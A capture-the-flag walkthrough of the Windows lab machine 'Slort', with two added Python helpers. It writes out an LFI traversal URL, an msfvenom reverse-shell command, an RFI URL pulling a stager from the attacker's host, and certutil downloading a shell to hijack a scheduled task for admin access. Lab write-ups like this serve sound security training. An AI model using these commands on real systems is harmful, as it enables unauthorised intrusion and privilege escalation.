Slort

Source: Proving Grounds OS: Windows Community Rating: Intermediate

Enumeration & Reconnaissance

  • I started as usual with autorecon, which exposed: FTP (21), MSRPC (135), NetBIOS (139), SMB (445), MySQL (3306), HTTP (4443), 5040, HTTP (8080), and the dynamic RPC range 49664 -> 49669.

Service Analysis

  • FTP did not allow anonymous login, so I started with the usual, HTTP. Both HTTP services (4443 and 8080) served XAMPP's default page, and access to phpMyAdmin was denied with the message:

[Screenshot: XAMPP default page]
Access Forbidden
  • The first round of directory fuzzing exposed nothing, and neither SMB nor MySQL provided anything useful. I kept going in circles for a bit until I fuzzed the sites again with a different wordlist:

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://192.168.213.53:4443/FUZZ
  • That's when "/site/" was exposed. This directory contained a simple PHP page whose URL takes a filename as a parameter: http://192.168.213.53:4443/site/index.php?page=main.php. I'm sure if I were in an anime, a light bulb would have appeared with the text "File Inclusion" flashing before my eyes.

[Screenshot: /site/ directory]

Gaining Initial Access

  • I tested the inclusion by visiting: http://192.168.213.53:4443/site/index.php?page=..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\System32\drivers\etc\hosts which worked! The hosts file is a good first target on Windows because it exists on every install and is readable by everyone.

[Screenshot: LFI check]
  • When facing a file inclusion vulnerability, it's important to check whether it is only Local File Inclusion or also Remote File Inclusion. On PHP, RFI requires allow_url_include to be enabled (it is off by default), and when it is, the include() pulls PHP from a URL you control and runs it on the target. Turns out we had RFI, and that was it: we were able to get a shell!

  • I generated a reverse shell payload with msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=192.168.45.170 LPORT=8178
  • Then, with a listener on port 8178 and a web server on port 901 serving my files, I included a small PHP stager (shell.php, not shown here) hosted on my machine via the vulnerable parameter. Because the included PHP executes on the target, the stager is what has to fetch and launch shell.exe there: http://192.168.213.53:4443/site/index.php?page=http://192.168.45.170:901/shell.php
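As an added example (my code, not the author's), here is a small Python probe that performs the two checks described above against a PHP include() parameter. It first includes the hosts file through the same backslash traversal to confirm LFI, then includes a PHP file served from the attacker's own machine to test for RFI. The served file contains only the token reversed, so the forward token shows up in the response only if the target fetched and executed it, which is exactly what allow_url_include=On permits. The target URL, parameter name and attacker address are taken from the write-up as placeholders and are assumptions you adjust.

```python
r"""Tell LFI apart from RFI on a PHP include() parameter.

Added example for this write-up, not the author's code. The target URL,
parameter name and attacker bind address/port are placeholders.
"""
import http.server
import secrets
import threading
import urllib.parse
import urllib.request

# The Windows file included on the page; the stock file contains "localhost".
HOSTS_FILE = r"Windows\System32\drivers\etc\hosts"
HOSTS_MARKER = "localhost"


def lfi_payload(relative_file: str, depth: int = 14) -> str:
    """Backslash traversal as used on the page (14 levels). Extra '..\\'
    segments past the drive root are harmless on Windows, so over-shooting
    the depth is safe."""
    return "..\\" * depth + relative_file


def rfi_probe_php(token: str) -> bytes:
    """PHP to host on the attacker side. The raw file only contains the
    reversed token, so the forward token appears in the target's response
    only if the target executed what it fetched, not merely echoed it."""
    return f'<?php echo strrev("{token[::-1]}"); ?>'.encode()


def classify(lfi_body: str, rfi_body: str, token: str) -> str:
    """Interpret the two responses: 'rfi' (which implies LFI as well),
    'lfi' (local include only) or 'none'."""
    if token in rfi_body:
        return "rfi"
    if HOSTS_MARKER in lfi_body:
        return "lfi"
    return "none"


class _ProbeHandler(http.server.BaseHTTPRequestHandler):
    """Serves the probe PHP as plain text, so it is never executed here."""
    payload = b""

    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(self.payload)

    def log_message(self, *args):  # keep the console quiet
        pass


def run_probe(target: str, param: str, bind: str, port: int) -> str:
    """Fire both requests against e.g. http://host:4443/site/index.php."""
    token = secrets.token_hex(8)
    _ProbeHandler.payload = rfi_probe_php(token)
    srv = http.server.HTTPServer(("0.0.0.0", port), _ProbeHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        def get(value: str) -> str:
            url = target + "?" + urllib.parse.urlencode({param: value})
            with urllib.request.urlopen(url, timeout=10) as r:
                return r.read().decode(errors="replace")
        lfi_body = get(lfi_payload(HOSTS_FILE))
        rfi_body = get(f"http://{bind}:{port}/probe.php")
    finally:
        srv.shutdown()
        srv.server_close()
    return classify(lfi_body, rfi_body, token)


if __name__ == "__main__":
    # Placeholders taken from the write-up; change them for your target.
    print(run_probe("http://192.168.213.53:4443/site/index.php", "page",
                    "192.168.45.170", 901))
```

If the result is "lfi" rather than "rfi", the usual next steps are the php://filter wrapper to read source, or log poisoning, rather than hosting a payload remotely.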

[Screenshot: reverse shell]

Privilege Escalation

  • Once I was in, I uploaded winPEAS and started checking around. The C drive had a Backup directory (C:\Backup), and inside I found a file, info.txt, containing:

[Screenshot: info.txt contents]
  • This indicated that TFTP.EXE in that directory is run periodically by a scheduled task (the Windows equivalent of a cron job). Before relying on that, I needed to know whether my user had write permission over the directory; icacls on C:\Backup tells you up front, but simply trying to replace the binary answers the same question. I performed the following steps:

rem keep the original binary so the task can be restored afterwards
move TFTP.EXE TFTP_old.EXE
rem fetch the msfvenom reverse shell from the attacker's web server (port 901)
certutil -urlcache -split -f http://192.168.45.170:901/shell.exe
rem drop it in under the name the scheduled task executes
move shell.exe TFTP.EXE
  • There we go: the next time the task fired, the listener on 8178 got a shell back as an admin.
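As an added example (my code, not the author's), the check I would run before swapping the binary: paste the output of icacls for the directory the task runs from into this Python and it reports whether a low-privileged principal (Everyone, Users, Authenticated Users, Interactive) holds a write-capable right on the directory itself, honouring DENY entries and skipping inherit-only (IO) entries that apply only to children. The icacls output below is constructed to resemble `icacls C:\Backup C:\Windows\System32` on this box; the group list and the set of rights treated as write are my assumptions.

```python
r"""Decide from `icacls` output whether a low-privileged user can write into
the directory a privileged scheduled task runs its binary from.

Added example for this write-up, not the author's code. SAMPLE_ICACLS is
constructed to look like `icacls C:\Backup C:\Windows\System32` output.
"""
from __future__ import annotations

import re

# Rights that allow creating or replacing files in a directory: the simple
# rights F (full), M (modify), W (write) and the specific rights GA/GW
# (generic all/write), WD (write data / add file), AD (append data / add
# subdirectory) and DC (delete child). Read-only sets such as (RX) do not.
WRITE_RIGHTS = {"F", "M", "W", "GA", "GW", "WD", "AD", "DC"}

# Principals every normal interactive user belongs to (compared lower-cased).
LOW_PRIV = {"everyone", "builtin\\users",
            "nt authority\\authenticated users", "nt authority\\interactive"}

# One ACE: '<principal>:(flag)(flag)...(rights)', e.g. 'BUILTIN\Users:(OI)(CI)(F)'
ACE_RE = re.compile(r"^(?P<who>.+?):(?P<parts>(?:\([^)]*\))+)$")


def _parse_ace(text: str):
    """Return (principal, rights, is_deny), or None for entries that do not
    apply to the directory itself: (IO) inherit-only and (N) no access."""
    m = ACE_RE.match(text.strip())
    if not m:
        return None
    parts = re.findall(r"\(([^)]*)\)", m.group("parts"))
    flags, rights = parts[:-1], parts[-1]
    if "IO" in flags or rights == "N":
        return None
    return m.group("who"), set(rights.split(",")), "DENY" in flags


def _split_path(first: str, continuation: list[str]) -> tuple[str, str]:
    """icacls prints the path once and indents the remaining ACEs to
    len(path)+1 columns, which splits path and first ACE reliably even when
    both contain spaces. A single-ACE entry falls back to the first space
    (heuristic: path without spaces)."""
    if continuation:
        col = len(continuation[0]) - len(continuation[0].lstrip(" "))
        return first[: col - 1], first[col:]
    path, ace = first.split(" ", 1)
    return path, ace


def parse_icacls(output: str) -> dict[str, list[tuple[str, set[str], bool]]]:
    """Group icacls output into {path: [(principal, rights, is_deny), ...]}."""
    entries = []
    for line in output.splitlines():
        if not line.strip() or line.startswith("Successfully processed"):
            continue
        if line.startswith(" "):
            entries[-1][1].append(line)
        else:
            entries.append((line, []))
    acls = {}
    for first, cont in entries:
        path, ace = _split_path(first, cont)
        parsed = [_parse_ace(a) for a in [ace, *cont]]
        acls[path] = [p for p in parsed if p is not None]
    return acls


def writable_by_low_priv(aces) -> bool:
    """True when a low-privileged principal is granted a write right and no
    DENY entry for one of those principals takes it away (deny wins)."""
    allowed = denied = False
    for who, rights, is_deny in aces:
        if who.lower() in LOW_PRIV and rights & WRITE_RIGHTS:
            if is_deny:
                denied = True
            else:
                allowed = True
    return allowed and not denied


def find_writable(output: str) -> list[str]:
    """Paths in the icacls output that a low-privileged user can write into."""
    return [p for p, aces in parse_icacls(output).items()
            if writable_by_low_priv(aces)]


# Constructed sample: C:\Backup grants Users full control (the write-up's
# situation); System32 grants them read/execute only, plus an inherit-only
# write entry that does not apply to the directory itself.
SAMPLE_ICACLS = r"""C:\Backup BUILTIN\Administrators:(I)(OI)(CI)(F)
          NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
          BUILTIN\Users:(I)(OI)(CI)(F)
          NT AUTHORITY\Authenticated Users:(I)(M)

C:\Windows\System32 NT SERVICE\TrustedInstaller:(F)
                    BUILTIN\Administrators:(RX)
                    BUILTIN\Users:(RX)
                    NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(W)

Successfully processed 2 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for path in find_writable(SAMPLE_ICACLS):
        print(f"low-privileged write access: {path}")  # C:\Backup
```

Pair this with `schtasks /query /fo LIST /v` on the target to confirm which task runs the binary and under which account; a writable directory only matters if something privileged executes from it.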

[Screenshot: privilege escalation shell]

Lessons Learned

  • Fuzzing with alternative wordlists can reveal hidden directories when initial scans turn up nothing.

  • A file inclusion vulnerability can turn out to be Remote File Inclusion when allow_url_include is enabled, which is a quick path from including a file to executing code.

  • Scheduled tasks or services that run binaries from writable directories are valuable privilege escalation vectors.
